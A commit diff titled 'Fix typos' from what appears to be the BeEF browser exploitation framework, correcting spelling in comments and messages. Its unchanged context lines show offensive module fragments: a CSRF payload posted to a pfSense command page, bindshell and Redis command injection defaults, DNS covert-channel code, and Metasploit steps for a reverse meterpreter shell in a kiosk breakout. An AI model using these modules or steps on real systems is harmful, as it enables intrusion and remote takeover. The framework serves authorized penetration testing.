Fix typos
This commit is contained in:
@@ -29,7 +29,7 @@ module BeEF
|
||||
#
|
||||
def register(owner, clss, method, params = [])
|
||||
unless verify_api_path(clss, method)
|
||||
print_error "API Registrar: Attempted to register non-existant API method #{clss} :#{method}"
|
||||
print_error "API Registrar: Attempted to register non-existent API method #{clss} :#{method}"
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
@@ -38,7 +38,7 @@ module BeEF
|
||||
end
|
||||
|
||||
#
|
||||
# set teh auth_timestamp
|
||||
# set the auth_timestamp
|
||||
#
|
||||
def set_auth_timestamp(time)
|
||||
@auth_timestamp = time
|
||||
|
||||
@@ -14307,7 +14307,7 @@ Ext.data.DataProxy.Error = Ext.extend(Ext.Error, {constructor:function (b, a) {
|
||||
this.arg = a;
|
||||
Ext.Error.call(this, b)
|
||||
}, name:"Ext.data.DataProxy"});
|
||||
Ext.apply(Ext.data.DataProxy.Error.prototype, {lang:{"action-undefined":"DataProxy attempted to execute an API-action but found an undefined url / function. Please review your Proxy url/api-configuration.", "api-invalid":"Recieved an invalid API-configuration. Please ensure your proxy API-configuration contains only the actions from Ext.data.Api.actions."}});
|
||||
Ext.apply(Ext.data.DataProxy.Error.prototype, {lang:{"action-undefined":"DataProxy attempted to execute an API-action but found an undefined url / function. Please review your Proxy url/api-configuration.", "api-invalid":"Received an invalid API-configuration. Please ensure your proxy API-configuration contains only the actions from Ext.data.Api.actions."}});
|
||||
Ext.data.Request = function (a) {
|
||||
Ext.apply(this, a)
|
||||
};
|
||||
|
||||
@@ -14,7 +14,7 @@ module BeEF
|
||||
|
||||
unless @config.key?('host') || @config.key?('uri') || @config.key?('port') ||
|
||||
@config.key?('user') || @config.key?('pass')
|
||||
print_error 'There is not enough information to initalize Metasploit connectivity at this time'
|
||||
print_error 'There is not enough information to initialize Metasploit connectivity at this time'
|
||||
print_error 'Please check your options in config.yaml to verify that all information is present'
|
||||
BeEF::Core::Configuration.instance.set('beef.extension.metasploit.enabled', false)
|
||||
BeEF::Core::Configuration.instance.set('beef.extension.metasploit.loaded', false)
|
||||
@@ -137,7 +137,7 @@ module BeEF
|
||||
res = super(@config['user'], @config['pass'])
|
||||
|
||||
unless res
|
||||
print_error '[Metasploit] Could not authenticate to Metasploit RPC sevrice.'
|
||||
print_error '[Metasploit] Could not authenticate to Metasploit RPC service.'
|
||||
return false
|
||||
end
|
||||
|
||||
|
||||
@@ -24,7 +24,7 @@ package {
|
||||
|
||||
if (!this._cam) {
|
||||
|
||||
//Either the camera is not available or some other error has occured
|
||||
//Either the camera is not available or some other error has occurred
|
||||
ExternalInterface.call("naPermissions");
|
||||
|
||||
} else if (this._cam.muted) {
|
||||
|
||||
@@ -165,7 +165,7 @@ search:
|
||||
je found ;cmd= found
|
||||
inc rbx
|
||||
dec rcx
|
||||
jrcxz notfound ;cmd= not in recieved buffer
|
||||
jrcxz notfound ;cmd= not in received buffer
|
||||
jmp search ;search some more
|
||||
found:
|
||||
xor rdi, rdi
|
||||
|
||||
@@ -169,7 +169,7 @@ search:
|
||||
je found ;cmd= found
|
||||
inc ebx
|
||||
dec ecx
|
||||
jecxz notfound ;cmd= not in recieved buffer
|
||||
jecxz notfound ;cmd= not in received buffer
|
||||
jmp search ;search some more
|
||||
|
||||
found:
|
||||
|
||||
@@ -26,7 +26,7 @@ shell:
|
||||
pop ecx ; Set ECX for the loop
|
||||
push_loop: ;
|
||||
push esi ; push a null dword
|
||||
loop push_loop ; keep looping untill we have pushed enough nulls
|
||||
loop push_loop ; keep looping until we have pushed enough nulls
|
||||
mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
|
||||
lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
|
||||
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
|
||||
@@ -34,8 +34,8 @@ push_loop: ;
|
||||
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
|
||||
push eax ; Push the pointer to the STARTUPINFO Structure
|
||||
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
|
||||
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
|
||||
push esi ; We dont specify any dwCreationFlags
|
||||
push esi ; The lpEnvironment is NULL so the new process will have the same environment as its parent
|
||||
push esi ; We don't specify any dwCreationFlags
|
||||
inc esi ; Increment ESI to be one
|
||||
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
|
||||
dec esi ; Decrement ESI back down to zero
|
||||
|
||||
@@ -18,7 +18,7 @@ beef.execute(function() {
|
||||
process.init(lFile);
|
||||
process.run(false,['/c', command_str],2);
|
||||
} catch (e) {
|
||||
result = "an unexpected error occured";
|
||||
result = "an unexpected error occurred";
|
||||
}
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);
|
||||
|
||||
@@ -57,7 +57,7 @@ function makeCSRF(token){
|
||||
// Final CSRF attack with right referer (because executed in the context)
|
||||
// and with right token captured above
|
||||
var response = ajax('/diag_command.php', 'POST', 'txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=' + payload + '&submit=EXECPHP&__csrf_magic=' + token);
|
||||
// Finally, redirect back to the intial hooked page
|
||||
// Finally, redirect back to the initial hooked page
|
||||
document.location=decodeURIComponent(redir);
|
||||
}
|
||||
|
||||
|
||||
@@ -48,7 +48,7 @@ class Inter_protocol_posix_bindshell < BeEF::Core::Command
|
||||
{ 'name' => 'ip', 'ui_label' => 'Target Address', 'value' => 'localhost' },
|
||||
{ 'name' => 'port', 'ui_label' => 'Target Port', 'value' => '4444' },
|
||||
{ 'name' => 'command_timeout', 'ui_label' => 'Timeout (s)', 'value' => '30' },
|
||||
{ 'name' => 'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to seperate commands', 'type' => 'textarea',
|
||||
{ 'name' => 'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to separate commands', 'type' => 'textarea',
|
||||
'value' => 'echo ID: ; id', 'width' => '200px' },
|
||||
{ 'name' => 'result_size', 'ui_label' => 'Result Size', 'description' => 'Expected maximum size of the result in bytes', 'value' => '1024' }
|
||||
]
|
||||
|
||||
@@ -9,7 +9,7 @@ beef:
|
||||
enable: true
|
||||
category: "IPEC"
|
||||
name: "Redis"
|
||||
description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Redis daemon on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the Redis commands are not returned to BeEF.<br/><br/>Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines."
|
||||
description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Redis daemon on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the Redis commands are not returned to BeEF.<br/><br/>Note: Use '\\n' to separate Redis commands and '\\\\n' for new lines."
|
||||
authors: ["bcoles"]
|
||||
target:
|
||||
working: ["FF", "C"]
|
||||
|
||||
@@ -10,7 +10,7 @@ class Inter_protocol_redis < BeEF::Core::Command
|
||||
{ 'name' => 'rhost', 'ui_label' => 'Target Address', 'value' => '127.0.0.1' },
|
||||
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '6379' },
|
||||
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' },
|
||||
{ 'name' => 'commands', 'ui_label' => 'Redis commands', 'description' => "Enter Redis commands to execute. Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines.",
|
||||
{ 'name' => 'commands', 'ui_label' => 'Redis commands', 'description' => "Enter Redis commands to execute. Note: Use '\\n' to separate Redis commands and '\\\\n' for new lines.",
|
||||
'type' => 'textarea', 'value' => cmd, 'width' => '200px' }
|
||||
]
|
||||
end
|
||||
|
||||
@@ -9,7 +9,7 @@ beef:
|
||||
enable: true
|
||||
category: "IPEC"
|
||||
name: "Bindshell (Windows)"
|
||||
description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: ampersands are required to seperate commands."
|
||||
description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: ampersands are required to separate commands."
|
||||
authors: ["bcoles", "wade"]
|
||||
target:
|
||||
working: ["FF", "C"]
|
||||
|
||||
@@ -15,7 +15,7 @@ class Inter_protocol_win_bindshell < BeEF::Core::Command
|
||||
{ 'name' => 'rhost', 'ui_label' => 'Target Address', 'value' => '127.0.0.1' },
|
||||
{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '4444' },
|
||||
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '30' },
|
||||
{ 'name' => 'commands', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type' => 'textarea',
|
||||
{ 'name' => 'commands', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: ampersands are required to separate commands', 'type' => 'textarea',
|
||||
'value' => 'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width' => '200px' }
|
||||
]
|
||||
end
|
||||
|
||||
@@ -5,14 +5,14 @@
|
||||
//
|
||||
|
||||
/*
|
||||
This JavaScript retreives data from a server via DNS covert channel.
|
||||
This JavaScript retrieves data from a server via DNS covert channel.
|
||||
|
||||
A remote controlled domain with a custom DNS server implementing covert channel logic is required.
|
||||
BeEF supports this feature via Server-to-Client DNS Tunnel extension.
|
||||
|
||||
The initial concept of the DNS covert channell and its implementation are described in the following literature:
|
||||
The initial concept of the DNS covert channel and its implementation are described in the following literature:
|
||||
- K.Born. Browser-Based Covert Data Exfiltration. http://arxiv.org/ftp/arxiv/papers/1004/1004.4357.pdf
|
||||
- W. Alkorn,C. Frichot, M.Orru. The Browser Hacker's Handbook. ISBN-13: 978-1118662090, ISBN-10: 1118662091
|
||||
- W. Alcorn,C. Frichot, M.Orru. The Browser Hacker's Handbook. ISBN-13: 978-1118662090, ISBN-10: 1118662091
|
||||
|
||||
*/
|
||||
beef.execute(function() {
|
||||
@@ -29,7 +29,7 @@ beef.execute(function() {
|
||||
var bit_transfered = new Array();
|
||||
var timing = new Array();
|
||||
|
||||
// Do the DNS query by reqeusting an image
|
||||
// Do the DNS query by requesting an image
|
||||
send_query = function(fqdn, msg, byte, bit) {
|
||||
var img = new Image;
|
||||
var fport = "";
|
||||
@@ -51,7 +51,7 @@ beef.execute(function() {
|
||||
}
|
||||
};
|
||||
|
||||
// Construct DNS names based on Active Directory SRV resource records pattern and resolv them via send_query function
|
||||
// Construct DNS names based on Active Directory SRV resource records pattern and resolve them via send_query function
|
||||
// See http://technet.microsoft.com/en-us/library/cc961719.aspx
|
||||
function get_byte(msg, byte) {
|
||||
bit_transfered[msg][byte] = 0;
|
||||
@@ -71,7 +71,7 @@ beef.execute(function() {
|
||||
}
|
||||
}
|
||||
|
||||
// Construct random sring
|
||||
// Construct random string
|
||||
function getRandomStr(n){
|
||||
return Math.random().toString(36).slice(2, 2 + Math.max(1, Math.min(n, 12)));
|
||||
}
|
||||
|
||||
@@ -9,7 +9,7 @@ beef:
|
||||
enable: true
|
||||
category: "IPEC"
|
||||
name: "DNS Tunnel: Server-to-Client"
|
||||
description: "This module retreives data sending by server over DNS covert channel (DNS tunnel).<br/><br/> A payload name and message are taken as input. The message is sent as a bitstream, decoded, and then can be accessed via Window object property specified in payload name parameter.<br/><br/>Note: To use this feature you should enable S2C DNS Tunnel extension."
|
||||
description: "This module retrieves data sent by the server over DNS covert channel (DNS tunnel).<br/><br/> A payload name and message are taken as input. The message is sent as a bitstream, decoded, and then can be accessed via Window object property specified in payload name parameter.<br/><br/>Note: To use this feature you should enable S2C DNS Tunnel extension."
|
||||
authors: ["dnkolegov"]
|
||||
target:
|
||||
working: "All"
|
||||
@@ -10,7 +10,7 @@ beef.execute(function() {
|
||||
var anchorsToCheck = '<%= @anchorsToCheck %>';
|
||||
var arrayOfAnchorsToCheck = [];
|
||||
|
||||
//the anchors should be seperated with ','
|
||||
//the anchors should be separated with ','
|
||||
//remove tabs, newlines, carriage returns and spaces
|
||||
anchorsToCheck = anchorsToCheck.replace(/[ \t\r\n]/g,'');
|
||||
arrayOfAnchorsToCheck = anchorsToCheck.split(',');
|
||||
@@ -61,7 +61,7 @@ beef.execute(function() {
|
||||
poll();
|
||||
}
|
||||
else {
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'time-out occured!');
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'time-out occurred!');
|
||||
}
|
||||
}, 100);
|
||||
};
|
||||
|
||||
@@ -69,7 +69,7 @@ beef.execute(function() {
|
||||
BIGipCookieValue = m[0].split('=')[1];
|
||||
result = 'BigIP_cookie_name=' + BIGipCookieName;
|
||||
|
||||
// Retreive pool name via cookie name
|
||||
// Retrieve pool name via cookie name
|
||||
if (BIGipCookieName.match(/^BIGipServer/) !== null) {
|
||||
poolName = BIGipCookieName.split('BIGipServer')[1];
|
||||
result += '&pool_name=' + poolName;
|
||||
@@ -84,6 +84,6 @@ beef.execute(function() {
|
||||
backend = f5CookieDecode(BIGipCookieValue);
|
||||
result += '&host=' + backend.host + '&port=' + backend.port;
|
||||
}
|
||||
else result = 'result=BigIP coookie not found'
|
||||
else result = 'result=BigIP cookie not found'
|
||||
beef.net.send('<%= @command_url %>', <%= @command_id %>, result);
|
||||
});
|
||||
|
||||
@@ -9,7 +9,7 @@ beef:
|
||||
enable: true
|
||||
category: ["Social Engineering"]
|
||||
name: "SiteKiosk Breakout"
|
||||
description: "This Module breaks out of SiteKiosk by using HTA. The HTA closes the kiosk and starts a reverse meterpreter shell via a powershell payload!<br>Before launching the module, do the following on Metasploit:<br>use exploit/windows/misc/psh_web_delivery<br>set URIPATH /psh<br>set PAYLOAD windows/meterpreter/reverse_https<br>set LHOST x.x.x.x<br>set LPORT 443<br>set ExitOnSession false<br>set AutoRunScript post/windows/manage/smart_migrate<br>exploit -j -z<br><br>After executing the module, follow this steps:<br>Click Save<br>Enter shell:ProgramFiles in the Save Dialogs adressbar<br>Navigate to C:\\Users\\Public\\Downloads<br>Save the file<br>After the Download is finished click on execute<br>Profit"
|
||||
description: "This Module breaks out of SiteKiosk by using HTA. The HTA closes the kiosk and starts a reverse meterpreter shell via a powershell payload!<br>Before launching the module, do the following on Metasploit:<br>use exploit/windows/misc/psh_web_delivery<br>set URIPATH /psh<br>set PAYLOAD windows/meterpreter/reverse_https<br>set LHOST x.x.x.x<br>set LPORT 443<br>set ExitOnSession false<br>set AutoRunScript post/windows/manage/smart_migrate<br>exploit -j -z<br><br>After executing the module, follow this steps:<br>Click Save<br>Enter shell:ProgramFiles in the Save Dialogs address bar<br>Navigate to C:\\Users\\Public\\Downloads<br>Save the file<br>After the Download is finished click on execute<br>Profit"
|
||||
authors: ["insertscript"]
|
||||
target:
|
||||
user_notify: ["IE"]
|
||||
|
||||
Reference in New Issue
Block a user